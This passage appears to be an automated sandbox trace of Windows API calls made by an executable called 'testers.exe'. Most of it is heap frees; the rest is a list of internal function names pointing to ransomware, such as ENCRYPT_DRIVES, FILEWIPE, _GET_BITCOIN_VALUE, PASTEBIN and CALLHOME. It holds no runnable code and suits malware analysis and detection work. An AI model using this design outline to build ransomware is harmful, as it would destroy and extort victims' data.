1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683368 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838d8 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683728 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683758 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683788 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683740 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837d0 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837a0 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837b8 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837e8 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683830 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683848 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838f0 | out: hHeap=0x650000) returned 1 [0071.117] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683878 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683890 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683950 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683968 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6842b0 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x684298 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6838d8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6842c8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6842c8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683388 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683368 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676840 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683368 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a750 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aca8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac90 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683388 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abe8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abb8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683388 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abe8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abb8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab58 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6833a8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab10 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6842c8 | out: hHeap=0x650000) returned 1 [0071.118] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x684298 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6842b0 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac60 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aca8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac90 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac18 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac00 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac48 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab70 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab88 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abe8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aaf8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abb8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab58 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aac8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa98 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab10 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab10 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6833c8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6833a8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676840 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa98 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abb8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6833c8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa98 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab10 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab58 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aac8 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa98 | out: hHeap=0x650000) returned 1 [0071.119] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abb8 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676890 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abb8 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676890 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6833d8 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a750 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676890 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac00 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6833e8 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aca8 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aac8 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa98 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67abb8 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab58 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab10 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac90 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac18 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac00 | out: hHeap=0x650000) returned 1 [0071.120] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837e8 | out: hHeap=0x650000) returned 1 [0071.135] IUnknown:Release (This=0x6766b0) returned 0x0 [0071.135] FreeLibrary (hLibModule=0x10000) returned 1 [0071.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x61f870, lpFilePart=0x63f890 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFilePart=0x63f890*="testers.exe") returned 0x31 [0071.136] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0071.136] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0071.136] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0071.136] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0071.136] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0071.136] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0071.136] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0071.136] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0071.136] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0071.136] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0071.137] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0071.137] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0071.137] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0071.137] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0071.137] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0071.137] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0071.137] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0071.137] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0071.137] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0071.137] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0071.137] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0071.137] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0071.137] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0071.137] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0071.137] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0071.137] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0071.137] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0071.137] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0071.138] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0071.138] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0071.138] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0071.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0071.139] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0071.139] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0071.139] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0071.139] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0071.139] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0071.139] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0071.139] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0071.139] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0071.140] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0071.140] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0071.140] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0071.140] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0071.140] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0071.140] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0071.140] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0071.140] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0071.140] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0071.140] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0071.140] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0071.140] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0071.140] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0071.140] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0071.140] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0071.140] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.140] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0071.140] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0071.141] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0071.141] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0071.141] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0071.141] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0071.141] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0071.141] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0071.141] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0071.141] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0071.141] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0071.141] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0071.141] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0071.141] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0071.141] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0071.141] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0071.141] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0071.141] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0071.141] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0071.141] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0071.141] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0071.141] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0071.142] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEMAPPING", cchLength=0x19 | out: lpsz="_WINAPI_CREATEFILEMAPPING") returned 0x19 [0071.142] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0071.142] CharUpperBuffW (in: lpsz="_WINAPI_MAPVIEWOFFILE", cchLength=0x15 | out: lpsz="_WINAPI_MAPVIEWOFFILE") returned 0x15 [0071.142] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0071.142] CharUpperBuffW (in: lpsz="_WINAPI_UNMAPVIEWOFFILE", cchLength=0x17 | out: lpsz="_WINAPI_UNMAPVIEWOFFILE") returned 0x17 [0071.142] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0071.142] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0071.142] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0071.142] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0071.142] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0071.142] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0071.142] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0071.142] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0071.142] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0071.142] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0071.142] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0071.142] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0071.142] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0071.142] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0071.143] CharUpperBuffW (in: lpsz="MYERRFUNC", cchLength=0x9 | out: 